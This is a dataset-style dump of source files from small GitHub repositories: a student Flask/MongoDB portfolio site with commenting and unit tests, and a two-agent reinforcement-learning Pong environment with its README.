0.6041385531425476, "avg_line_length": 30.53900718688965, "blob_id": "71c19ade2dbfb9d4a740f6949a11b073fd554c99", "content_id": "e2b4b9dbed4ed62c1fd37dac3c84a8f9c5526c99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4446, "license_type": "no_license", "max_line_length": 138, "num_lines": 141, "path": "/web/server.py", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "'''\nCreated on Mar 7, 2017\n\n@author: mjschaub\n'''\n\n\nfrom flask import Flask,render_template, abort, request\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\n\nclient = MongoClient()\napp = Flask(__name__)\n\n\n'''\nroutes to the homepage\n@return the render html template for the index page\n'''\[email protected]('/')\ndef home_page():\n return render_template('index.html')\n'''\nroutes the project view page where you see all of the commits made\n@return the html template for the page\n'''\[email protected]('/projects')\ndef assignment_page():\n return render_template('log_view.html',portfolio=portfolio)\n'''\nroutes the invidual commit page for the certain revision number\n@return the html template for this page\n'''\[email protected]('/projects/<revision_num>')\ndef project_page(revision_num=0):\n logs = db['logs'].find()\n for i in logs:\n if int(i['revision']) == int(revision_num):\n files = i['files']\n return render_template('revision_view.html',files=files,revision_num=revision_num)\n\n'''\n routes the app for the individual file page where you do the commenting\n @param the route of the site\n @return the html template to use\n ''' \[email protected]('/projects/<revision_num>/<file_id>', methods=['POST','GET'])\ndef file_page(file_id=0,revision_num=0):\n \n db = client['portfolio']\n comments = db['comments']\n \n if request.method == 'POST':\n \n user = request.form['username']\n comment = request.form['comment']\n \n comment = cleanup_comment(comment)\n 
print({'status':'OK','user':user,'comment':comment})\n if request.form['type-of-comment'] == \"normalComment\":\n #add comment\n result = comments.insert_one({'user':user,'comment':comment,'file_id':file_id,'reply_id':-1,'replies':[]})\n print(result)\n else:\n #reply comment\n reply_id = request.form['type-of-comment']\n print('reply id: ',reply_id)\n result = comments.insert_one({'user':user,'comment':comment,'file_id':file_id,'reply_id':reply_id,'replies':[]})\n new_comment = comments.find({'user':user,'comment':comment})\n reply_comment = comments.find({'_id': ObjectId(reply_id)})\n \n for i in reply_comment:\n comments.update({'_id' : ObjectId(reply_id)}, { '$push': {'replies' : new_comment[0]}})\n \n\n file_given = None\n path = None\n files = db['files'].find()\n for i in files:\n if int(i['file_id']) == int(file_id):\n path = i['path']\n file_given = i['text']\n \n if file_given == None:\n return abort(500)\n \n comments = comments.find()\n page_comments = []\n for i in comments:\n if i['file_id'] == file_id:\n page_comments.append(i)\n print(i)\n\n return render_template('project.html',path=path,file=file_given,file_id=file_id,page_comments=page_comments,revision_num=revision_num)\n\n'''\nmethod to check each comment does not contain the filtered text and if it does then relace it with the good words\n@param comment_text: the comment to filter\n@return the new comment\n'''\ndef cleanup_comment(comment_text):\n db = client['portfolio']\n word_filter = db['filter'].find()\n \n for i in word_filter:\n for j in range(len(i['bad_words'])):\n print(i['bad_words'][j])\n if i['bad_words'][j] in comment_text:\n print(\"old text: \",comment_text)\n comment_text = comment_text.replace(i['bad_words'][j],i['good_words'][j])\n print(\"new_text: \",comment_text)\n \n return comment_text\n\n'''\nsets up the database to have the filtered words in it, is run once to create the data\n'''\ndef setup_bad_words():\n bad_words = ['moist','patriots','ugly','justin 
bieber','bing']\n good_words = ['wet','worst team ever', 'beautiful','he who shall not be named','google']\n db = client['portfolio']\n word_filter = db['filter']\n \n word_filter.insert_one({'bad_words':bad_words,'good_words':good_words })\n check_filter = db['filter'].find()\n for i in check_filter:\n print(i)\n \n\nif __name__ == \"__main__\":\n \n db = client['portfolio']\n portfolio = db['logs'].find()\n files = db['files'].find()\n comments = db['comments'].find()\n #setup_bad_words()\n \n app.secret_key = 'super secret key'\n app.config['SESSION_TYPE'] = 'mongodb'\n \n app.run()" }, { "alpha_fraction": 0.5035971403121948, "alphanum_fraction": 0.5203837156295776, "avg_line_length": 18, "blob_id": "44613942122817bcfde2fcd829a164f77cae28d2", "content_id": "b92e2b7efb01a1f1e4841cffa7e58e4753a60255", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 417, "license_type": "no_license", "max_line_length": 76, "num_lines": 22, "path": "/projects/Project.py", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "'''\nCreated on Mar 8, 2017\n\n@author: mjschaub\n'''\n\nclass Project(object):\n '''\n the project object\n '''\n\n\n def __init__(self,path='',size=0, action='',kind='', text='',file_id=0):\n '''\n Constructor to initialize a project\n '''\n self.path = path\n self.size = size\n self.action = action\n self.kind = kind\n self.text=text\n self.file_id = file_id" }, { "alpha_fraction": 0.8025477528572083, "alphanum_fraction": 0.8025477528572083, "avg_line_length": 155.3333282470703, "blob_id": "dbd791f78a7f5ce8722781f4aee49fe365b8c3e2", "content_id": "56bc29ff2fc8de7c257f813f51b29b4f817a21d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 471, "license_type": "no_license", "max_line_length": 450, "num_lines": 3, "path": "/README.md", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "# 
portfolio-site\n\nA portfolio site of every commit I made in my programming studio class. It parses data from subversion, places the information into commits and lets you view each iteration of each project, including the code, size, and lets you comment on a file. The backend parser will upload the commit and file information to a mongodb database started up on the default port and the site will use that database for the portfolio as well as the comment sections. \n" }, { "alpha_fraction": 0.5653631091117859, "alphanum_fraction": 0.6067039370536804, "avg_line_length": 19.363636016845703, "blob_id": "f35f0f7cc5b53b587e87fb59d63fa9cf3318bece", "content_id": "4f852e6cef512e7e24ac0cc38a8f71f650ec62da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 895, "license_type": "no_license", "max_line_length": 71, "num_lines": 44, "path": "/tests/testFlask.py", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "'''\nCreated on Mar 12, 2017\n\n@author: mjschaub\n'''\n\nimport unittest,requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\n\n'''\nThe api testing class\n'''\nclass Test(unittest.TestCase):\n\n '''\n sets up the parameters\n '''\n def setUp(self):\n\n self.baseURL = 'http://localhost:5000'\n \n\n '''\n tests the endpoints for the portfolio website\n '''\n def test_gets(self):\n \n r = requests.get(self.baseURL+'/')\n self.assertEqual(r.status_code,200)\n r2 = requests.get(self.baseURL+'/projects')\n self.assertEqual(r2.status_code,200)\n r2 = requests.get(self.baseURL+'/projects/12')\n self.assertEqual(r2.status_code,200)\n r2 = requests.get(self.baseURL+'/projects/984028')\n self.assertEqual(r2.status_code,500)\n \n\n\nif __name__ == \"__main__\":\n \n \n \n unittest.main()" }, { "alpha_fraction": 0.5667550563812256, "alphanum_fraction": 0.6122900247573853, "avg_line_length": 51.627906799316406, "blob_id": "0f78ee4d9fb578a7eabf46481cbcdc3362c53f32", 
"content_id": "7cc94e620d5e165cff3f413a956792e54e8a7bfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2262, "license_type": "no_license", "max_line_length": 560, "num_lines": 43, "path": "/tests/testParser.py", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "'''\nCreated on Mar 12, 2017\n\n@author: mjschaub\n'''\nimport unittest\nimport parser.xml_parser as parse\n\n\nclass Test(unittest.TestCase):\n\n '''\n tests that parsing the log returns a list of entries and each entry has the correct information\n '''\n def testParseLog(self):\n entries = parse.parse_log('test_log.xml')\n self.assertEqual(len(entries),1)\n self.assertEqual(entries[0][0]['revision'],u'6401')\n self.assertEqual(entries[0][1],u'mjschau2')\n self.assertEqual(entries[0][2],u'2017-03-06T16:59:20.880790Z')\n self.assertEqual(entries[0][3],['/mjschau2/Assignment2.1', '/mjschau2/Assignment2.1/Actor.py', '/mjschau2/Assignment2.1/CreateGraph.py', '/mjschau2/Assignment2.1/Graph.py', '/mjschau2/Assignment2.1/GraphVis.py', '/mjschau2/Assignment2.1/Graph_API.py', '/mjschau2/Assignment2.1/Movie.py', '/mjschau2/Assignment2.1/Test_Api.py', '/mjschau2/Assignment2.1/Test_Graph.py', '/mjschau2/Assignment2.1/Testing Plan Assignment #2.docx', '/mjschau2/Assignment2.1/graph_data.json', '/mjschau2/Assignment2.1/graph_setup.log', '/mjschau2/Assignment2.1/graphics.py'])\n self.assertEqual(entries[0][4],[{'action': 'A', 'kind': 'dir'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}, {'action': 'A', 'kind': 'file'}])\n self.assertEqual(entries[0][5],u'importing assignment 2.1')\n \n \n pass \n '''\n tests that you can get 
the size of a file from the list xml (that's all I get from the list)\n '''\n def testParseList(self):\n entry = parse.parse_log('test_log.xml')\n curr_path = entry[0][3][0]\n size1 = parse.parse_list('test_list.xml',curr_path.replace('/mjschau2/',''))\n self.assertEqual(size1, 0)\n curr_path = entry[0][3][1]\n size1 = parse.parse_list('test_list.xml',curr_path.replace('/mjschau2/',''))\n self.assertEqual(size1, u'1623')\n \n pass\n\nif __name__ == \"__main__\":\n \n unittest.main()" }, { "alpha_fraction": 0.5253682732582092, "alphanum_fraction": 0.5351881980895996, "avg_line_length": 21.148147583007812, "blob_id": "c9352417b2e1124089ae3ec8b3819b396ed47af3", "content_id": "abe10952ff5c83d65bf231f2ea3168f08c0a8172", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 611, "license_type": "no_license", "max_line_length": 73, "num_lines": 27, "path": "/projects/log_entry.py", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "'''\nCreated on Mar 7, 2017\n\n@author: mjschaub\n'''\n\nclass log_entry(object):\n '''\n log_entry class for each commit\n '''\n\n def __init__(self,revision = 0, author='',date='',msg='',files = []):\n '''\n Constructor\n '''\n self.author = author\n self.date = date\n self.revision = revision\n self.msg = msg\n self.files = files\n '''\n sets the size of the file or directory\n @param path: path of the file to change\n @param size: the size of the file\n '''\n def set_size(self,path_idx,size):\n self.size[path_idx] = size\n \n " } ]
8
or2008/slideshow_project
https://github.com/or2008/slideshow_project
3a02354b7a78087affe98dbd75c59af4ab22c3e8
ed74abc37977cf8f909b49bb6bfaf0b59b60a7e1
a5ef0763cc8fce128ba9d5aebbcbd31407140245
refs/heads/master
2021-01-23T15:42:03.891960
2013-02-20T08:25:29
2013-02-20T08:25:29
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7025495767593384, "alphanum_fraction": 0.7025495767593384, "avg_line_length": 28.41666603088379, "blob_id": "63c03774d0e7a38f6936d1aed6c3d4527f67cd3b", "content_id": "5ceb8149cbe94d0f35b57f499d12c1c07cd5aab1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 353, "license_type": "no_license", "max_line_length": 49, "num_lines": 12, "path": "/src/slideshow/core/views.py", "repo_name": "or2008/slideshow_project", "src_encoding": "UTF-8", "text": "# Create your views here.\nfrom django.http import HttpResponse, HttpRequest\nfrom django.template import Context, loader\nfrom slideshow.core.models import Slideshow\n\ndef home(request):\n t = loader.get_template('index.html')\n c = Context({\n 'title': \"Slideshow Project!\",\n 'user': request.user,\n})\n return HttpResponse(t.render(c))\n" }, { "alpha_fraction": 0.4571428596973419, "alphanum_fraction": 0.4571428596973419, "avg_line_length": 17, "blob_id": "8c183a94b524fbc22e781e97a3405b340c611015", "content_id": "05979cb90ae5979b125e0d678cd8f0061324c28b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 35, "license_type": "no_license", "max_line_length": 17, "num_lines": 2, "path": "/README.md", "repo_name": "or2008/slideshow_project", "src_encoding": "UTF-8", "text": "slideshow_project\n=================" } ]
2
ganeshlore/currency-converter
https://github.com/ganeshlore/currency-converter
b4dcfc801440206b1f7369a214ae36a4ca5c1a6e
8e3f5687b6cc1daa5fe12796fa91282179a5d31f
b5012a22331a99221741638fce99c02843c86f8b
refs/heads/master
2022-11-28T05:34:09.931620
2020-08-01T14:31:40
2020-08-01T14:31:40
284,271,638
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7125645279884338, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 37.733333587646484, "blob_id": "1ce2994edba8e734476c265047054c23b72ebe8d", "content_id": "61ff31f56ab4a83eb7d40aac3ad20dca23223620", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 76, "num_lines": 15, "path": "/google_apis/views.py", "repo_name": "ganeshlore/currency-converter", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse\nfrom google_currency import convert\nimport json \n# Create your views here.\ndef convert_currency(request):\n # Get Params\n from_country = request.GET.get('from')\n to_country = request.GET.get('to')\n amount = request.GET.get('amount')\n data = convert(from_country if from_country else 'usd',\n to_country if to_country else 'inr',\n int(amount) if amount is not None and amount .isnumeric() else 1)\n return JsonResponse(json.loads(data))\n" }, { "alpha_fraction": 0.7352941036224365, "alphanum_fraction": 0.7352941036224365, "avg_line_length": 23.428571701049805, "blob_id": "a3599a244d764629b7b183c9d5c0197d6ced0b57", "content_id": "ad7ddd7a76c955a7212fd9e0b2b6c8d8f0434670", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 170, "license_type": "no_license", "max_line_length": 77, "num_lines": 7, "path": "/google_apis/urls.py", "repo_name": "ganeshlore/currency-converter", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . 
import views\n\napp_name = 'google_apis'\nurlpatterns = [\n path('convert_currency', views.convert_currency, name='convert_currency')\n]" }, { "alpha_fraction": 0.6776859760284424, "alphanum_fraction": 0.6804407835006714, "avg_line_length": 32, "blob_id": "e90119174c062db718a9a7eb2fc2cae84c305a08", "content_id": "f5e9729bdaab941ee8cc41b3dd606039e3cc8f94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 363, "license_type": "no_license", "max_line_length": 71, "num_lines": 11, "path": "/currency/views.py", "repo_name": "ganeshlore/currency-converter", "src_encoding": "UTF-8", "text": "# from django.shortcuts import render\n# # from .models import Search,\n\n# # Create your views here.\n\n\n# def index(request):\n# # latest_search_result = Search.objects.order_by('-pub_date')[:5]\n# # context = {'latest_search_result':latest_search_result}\n# # return render(request,'scrapper/index.html',context)\n# return render(request, 'index.html')\n" } ]
3
sacharya99/img_cls
https://github.com/sacharya99/img_cls
88adc32d40cd8ecf081709d9eac7f13c12b4314d
9ce5720d284b6435bc2c1bfd9d54700bdc8e4e83
a93a5067c3df4efacb2868415260302eab067697
refs/heads/master
2021-06-28T08:02:14.630382
2021-05-31T03:47:23
2021-05-31T03:47:23
229,692,654
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.559967577457428, "alphanum_fraction": 0.6126418113708496, "avg_line_length": 20.867923736572266, "blob_id": "6a9b03edbb645ad8291c71a0e9ab5e5a3f859352", "content_id": "56b0ce1889cb633380cd486221c58d401ecd7d42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1234, "license_type": "no_license", "max_line_length": 103, "num_lines": 53, "path": "/face_recognition.py", "repo_name": "sacharya99/img_cls", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 19 14:58:02 2019\r\n\r\n@author: Sayak\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nface_classifier=cv2.CascadeClassifier(r\"D:\\Datasets\\data\\haarcascades\\haarcascade_frontalface_alt.xml\")\r\n\r\ndef face_extractor(img):\r\n gray=cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n faces=face_classifier.detectMultiScale(gray,1.3,5)\r\n \r\n\r\n\r\n\r\n if faces is():\r\n return None\r\n\r\n for(x,y,w,h) in faces:\r\n cropped_face=img[y:y+h,x:x+w]\r\n \r\n return cropped_face\r\n\r\ncap=cv2.VideoCapture(0)\r\ncount=0\r\n\r\nwhile True:\r\n ret,frame=cap.read()\r\n if face_extractor(frame) is not None:\r\n count+=1\r\n face=cv2.resize(face_extractor(frame),(200,200))\r\n face=cv2.cvtColor(face,cv2.COLOR_BGR2GRAY)\r\n\r\n file_name_path=r\"D:\\Datasets\\face2\\\\\"+str(count)+'.jpg'\r\n cv2.imwrite(file_name_path,face)\r\n\r\n cv2.putText(face,str(count),(50,50),cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\r\n cv2.imshow('Face Cropper',cv2.resize(face,(400,400)))\r\n \r\n else:\r\n print(\"Face not found!!\")\r\n pass\r\n \r\n if cv2.waitKey(25)==ord('q') or count==100:\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\nprint('Collecting Samples complete!!')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n " } ]
1
mariuspod/safe-transaction-service
https://github.com/mariuspod/safe-transaction-service
c09b325de0ce046fb5a899fea931df658d8263b1
c91f945b86ca3e37aaffad17fc8d493840c9770f
6e1d701c9ed3ae78c86776185c1addf641b0e477
refs/heads/master
2023-06-01T17:59:11.128049
2021-06-16T13:03:39
2021-06-16T13:03:39
377,118,147
0
0
MIT
2021-06-15T10:07:31
2021-06-14T14:02:02
2021-06-15T10:02:36
null
[ { "alpha_fraction": 0.6761133670806885, "alphanum_fraction": 0.6761133670806885, "avg_line_length": 35.592594146728516, "blob_id": "e269dbbffaaed978150a70e7f05daa21e6f9b4c7", "content_id": "84caff59f4b1b25900a641fa388a900b9acd33e4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 988, "license_type": "permissive", "max_line_length": 119, "num_lines": 27, "path": "/safe_transaction_service/contracts/management/commands/sync_contract_abis.py", "repo_name": "mariuspod/safe-transaction-service", "src_encoding": "UTF-8", "text": "from django.core.management.base import BaseCommand\n\nfrom gnosis.eth import EthereumClientProvider\n\nfrom ...models import Contract\n\n\nclass Command(BaseCommand):\n help = 'Sync contract names/ABIS scraping from etherscan/sourcify'\n\n def add_arguments(self, parser):\n parser.add_argument('--all', help=\"Sync contract names/ABIS for contracts already synced\", action='store_true',\n default=False)\n\n def handle(self, *args, **options):\n every_contract = options['all']\n\n ethereum_client = EthereumClientProvider()\n network = ethereum_client.get_network()\n\n contract_queryset = Contract.objects.all()\n if not every_contract:\n contract_queryset = contract_queryset.filter(contract_abi=None)\n\n for contract in contract_queryset:\n if contract.sync_abi_from_api(network=network):\n self.stdout.write(self.style.SUCCESS(f'Synced contract {contract.address} - {contract.name}'))\n" }, { "alpha_fraction": 0.5633803009986877, "alphanum_fraction": 0.7042253613471985, "avg_line_length": 16.75, "blob_id": "f1b6fd26514b8741e4d3e79777934ae9296978ee", "content_id": "e27b3d2f4b2bb3a203e0c4f255375664b5e306c4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 142, "license_type": "permissive", "max_line_length": 20, "num_lines": 8, "path": "/requirements-test.txt", "repo_name": "mariuspod/safe-transaction-service", 
"src_encoding": "UTF-8", "text": "-r requirements.txt\ncoverage==5.5\nfactory-boy==3.2.0\nfaker==8.7.0\npytest-celery==0.0.0\npytest-django==4.4.0\npytest-sugar==0.9.4\npytest==6.2.4\n" } ]
2
deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-
https://github.com/deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-
3da4c2105f20c9b4b8e5bc9fa122a9baca51f450
881ca4d55c84a68fb290fab3ab019c7e06100d50
7f1116f6cf6a2702f747448548cf3c62ed8d7cc3
refs/heads/master
2020-04-20T00:37:32.484517
2019-01-31T16:53:56
2019-01-31T16:53:56
168,525,624
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5019230842590332, "alphanum_fraction": 0.5398601293563843, "avg_line_length": 29.28877067565918, "blob_id": "82da8979a44b81aa3bad7e4f8b882338332bde45", "content_id": "d514ae6244d05cf41d5e6900b6d094db9ff52f0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5720, "license_type": "no_license", "max_line_length": 111, "num_lines": 187, "path": "/Pong2.py", "repo_name": "deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-", "src_encoding": "UTF-8", "text": "from numpy import random\nimport pygame, sys\nfrom pygame.locals import *\nimport pygame.surfarray as sarray\nimport numpy as np\n\nwhite = (255,255,255)\nblack = (0,0,0)\n\nwindow_width = 400\nwindow_height = 400\n\npaddle_width = 10\npaddle_height = 60\npaddle_buffer = 10 \n\nball_width = 10\nball_height = 10\n\npaddle_speed = 2\nball_x_speed = 3\nball_y_speed = 2\n\nscreen = pygame.display.set_mode((window_width, window_height))\n\n# Possible actions -1,0,1\n\nclass PongObject :\n def __init__(self, pos):\n self.pos = pos\n self.action = [0,1,0]\n self.score = 0\n def update_paddle(self, act):\n self.act = act\n sum = 0\n for i in range(0,3):\n if(self.act[i]==1):\n sum = i-1\n break\n \n self.pos[1] = self.pos[1] + sum*paddle_speed\n if(self.pos[1] < 0):\n self.pos[1] = 0\n if(self.pos[1] > window_height - paddle_height):\n self.pos[1] = window_height - paddle_height\n \nclass PongBall():\n def __init__(self, pos):\n self.pos = pos\n num = np.random.randint(1, 10)\n self.xdir = np.random.randint(-1, 2)\n self.ydir = np.random.randint(-1, 2)\n if(0 < num < 3):\n self.xdir = 1\n self.ydir = 1\n if (3 <= num < 5):\n self.xdir = -1\n self.ydir = 1\n if (5 <= num < 8):\n self.xdir = 1\n self.ydir = -1\n if (8 <= num < 10):\n self.xdir = -1\n self.ydir = -1\n \n def rest(self):\n num = np.random.randint(1, 10)\n self.xdir = np.random.randint(-1, 2)\n self.ydir = np.random.randint(-1, 2)\n if(0 < num < 3):\n self.xdir = 1\n 
self.ydir = 1\n if (3 <= num < 5):\n self.xdir = -1\n self.ydir = 1\n if (5 <= num < 8):\n self.xdir = 1\n self.ydir = -1\n if (8 <= num < 10):\n self.xdir = -1\n self.ydir = -1\n #def update_ball():\n #None\nclass PongGame():\n #metadata = {'render.modes' : ['human', 'rgb_array']} \n #Rect(left, top, width, height)\n def __init__(self):\n self.paddle1 = PongObject([paddle_buffer, window_height/2 - paddle_height/2])\n self.paddle2 = PongObject([window_width-paddle_buffer-paddle_width, window_height/2 - paddle_height/2])\n self.ball = PongBall([window_width/2 - ball_width/2, window_height/2 + ball_height/2])\n\n def reset_(self):\n self.paddle1 = PongObject([paddle_buffer, window_height/2 - paddle_height/2])\n self.paddle2 = PongObject([window_width-paddle_buffer-paddle_width, window_height/2 - paddle_height/2])\n self.ball = PongBall([window_width/2 - ball_width/2, window_height/2 + ball_height/2])\n self.ball.rest()\n self.step_([0,1,0], [0,1,0])\n \n def step_(self, act1, act2):\n\n self.paddle1.update_paddle(act1)\n self.paddle2.update_paddle(act2)\n\n pad1Ypos = self.paddle1.pos[1]\n pad2Ypos = self.paddle2.pos[1]\n \n #Update Ball\n ballXpos = self.ball.pos[0]\n ballYpos = self.ball.pos[1]\n\n ballXpos = ballXpos + self.ball.xdir * ball_x_speed\n ballYpos = ballYpos + self.ball.ydir * ball_y_speed\n\n #agent1\n if( ballXpos <= paddle_buffer + paddle_width and\n ballYpos + ball_height >= pad1Ypos and ballYpos - ball_height<= pad1Ypos + paddle_height):\n self.ball.xdir = 1\n self.paddle1.score+=1\n self.paddle2.score+=1\n #ballXpos = paddle_buffer + paddle_width\n\n elif(ballXpos <= 0):\n self.ball.xdir = 1\n self.paddle1.score-=1\n self.paddle2.score-=1\n\n #agent2\n if(ballXpos >= window_width - paddle_width - paddle_buffer and\n ballYpos + ball_height>=pad2Ypos and ballYpos - ball_height <= pad2Ypos + paddle_height):\n self.ball.xdir = -1\n self.paddle1.score+=1\n self.paddle2.score+=1\n #ballXpos = window_width - paddle_width - paddle_buffer - ball_width\n\n 
elif(ballXpos > window_width - ball_width):\n self.ball.xdir = -1\n self.paddle1.score-=1\n self.paddle2.score-=1\n\n #ball hits top\n if(ballYpos <=0):\n ballYpos = 0\n self.ball.ydir = 1\n #ball hits the bottom\n if(ballYpos >= window_height - ball_height):\n ballYpos = window_height - ball_height\n self.ball.ydir = -1\n\n self.ball.pos[0] = ballXpos\n self.ball.pos[1] = ballYpos\n\n screen2 = self.getFrame()\n \n return [screen2, self.paddle1.score, self.paddle2.score]\n \n\n def getFrame(self):\n pygame.event.pump()\n screen.fill(black)\n\n #draw paddle\n p1 = pygame.Rect(self.paddle1.pos[0], self.paddle1.pos[1],paddle_width, paddle_height)\n pygame.draw.rect(screen, white, p1)\n p2 = pygame.Rect(self.paddle2.pos[0], self.paddle2.pos[1], paddle_width, paddle_height)\n pygame.draw.rect(screen, white, p2)\n\n #draw ball\n bll = pygame.Rect(self.ball.pos[0], self.ball.pos[1], ball_width, ball_height)\n pygame.draw.rect(screen, white, bll)\n\n image_data = pygame.surfarray.array3d(pygame.display.get_surface())\n pygame.display.flip()\n return image_data\n'''\na = PongGame()\ni = 0\ntemp = a.reset_()\nfor i in range(10000):\n act1 = [0,0,0]\n act2 = [0,0,0]\n j = np.random.randint(-1,2)\n act1[j] = 1\n j = np.random.randint(-1,2)\n act2[j] = 1\n temp = a.step_(act1, act2)\n #print(a.paddle1.score,\" \",a.paddle2.score) \n'''\n\n\n\n \n \n \n \n \n" }, { "alpha_fraction": 0.7715979218482971, "alphanum_fraction": 0.7941645979881287, "avg_line_length": 117.54054260253906, "blob_id": "9793b95edb2a8085a3f125caccc04a46e1aa0d5d", "content_id": "9e960ddb8a65ce6f43fc66827cd0510673c04cf4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4387, "license_type": "no_license", "max_line_length": 406, "num_lines": 37, "path": "/README.md", "repo_name": "deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-", "src_encoding": "UTF-8", "text": "# Reinforcement Learning in Multiagent system (pong game)\n\nIn this 
project my aim is to investigate if two agents are capable of interacting with each other in a pong environment and how they would coordinate with each other in order to not let the pong ball hit the vertical walls behind the paddles. These agents are trained by reinforcement learning technique.\n\n- [Multiagent Pong Game Environment (both agents can be controlled)](https://github.com/deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-/blob/master/Pong2.py)\n- [Model for training both the agents simultaneously](https://github.com/deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-/blob/master/mlagent.ipynb)\n- Youtube Video - (https://www.youtube.com/watch?v=J3B3H2fU7jo)\n\n<img src = \"https://github.com/deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-/blob/master/gif.gif\" height = \"300\" width =\"300\" href = \"https://www.youtube.com/watch?v=J3B3H2fU7jo\">\n\n\n## Building the game environment \n\n- The first and foremost requirement of the project was to build such a game environment in which I could control both the game playing agents (paddles in my case). For this I created a PongObject class and PongBall class for the two paddles (my learning agents) and the ball respectively. Both the classes had the initialization method in which their positions, action and initial score were initialized. \n\n- The PongObject class also had an update method which was used to update the position of the paddle according to the given action. The ball in the game environment was initially sent into a random direction and after that the game was played by the paddle.\n\n- The major class in the pong game was the PongGame class. It had 2 objects of the PongObject class namely paddle1 and paddle2 and one object of the PongBall class that is the ball.\n\n- The PongGame class has a step_() method which is used to take in action1 and action2 parameters. 
They are the actions provided by the model, to be given to the paddle1 and paddle2 objects. It also has the whole update method for the ball in the pong game as to how it will react in different situations depending upon the actions taken by the paddle.\n\n- Finally the score is also updated in this method according to the action and state of the paddle and ball. The PongGame class also has a getFrame() method which is used to return the current frame of the game screen to be used as state in our model. Also the step_() function returns the paddle1 and paddle2 score along with the frame after taking the given actions. \n\n### Game Environment\n<img src=\"https://github.com/deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-/blob/master/Screen%20Shot%202018-12-09%20at%208.12.27%20PM.png\" width=\"300\" hspace = 10> <img src=\"https://github.com/deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-/blob/master/Screen%20Shot%202018-12-09%20at%208.12.35%20PM.png\" width=\"300\">\n\n## Model for reinforcement learning\n\n- I used reinforcement learning method known as deep q learning for solving the above problem and developing a suitable model for the game. \n\n- In my network the input was a grayscale image of 84x84 size and 4 of them were stacked in order to give the correct representation of the state. They were passed to the network and finally a three value solution was obtained which corresponded to each of the action of the paddle that is go up, stay there and go down action. The maximum value between the \nthree was selected as the action to be taken. \n\n- I also used experience relay technique in which sample of each state, action, best action taken to maximise reward and reward were stored which were used to train my deep convolutional neural network. A random sample of batch of data was selected at each transition and was used to update the parameters of the network. 
\n\n- I also used exploration vs exploitation in which based on a certain probability the agent took a random action which was not the maximising reward action. This was done so that the agent does not get trapped in a local maxima and return erroneous actions. The probability of random action was decreased monotonically with time as the network learned better. The deep q learning model :-\n<img src=\"https://github.com/deepanshu96/Reinforcement_Learning_Multiagent_system-pong-game-/blob/master/Picture5.png\" width=\"400\" > \n" } ]
2
Zhang-Jikang/python_study
https://github.com/Zhang-Jikang/python_study
d8d290e021ce0225921125299c56d77230af4a65
bbe30658d30e183b44c313ccea3dd6ff5deb7a95
f9cc52acd0a6bc10aee3204bbd310ed1a19759da
refs/heads/master
2022-02-18T23:20:31.806131
2019-08-24T13:10:05
2019-08-24T13:10:05
null
0
0
null
null
null
null
null
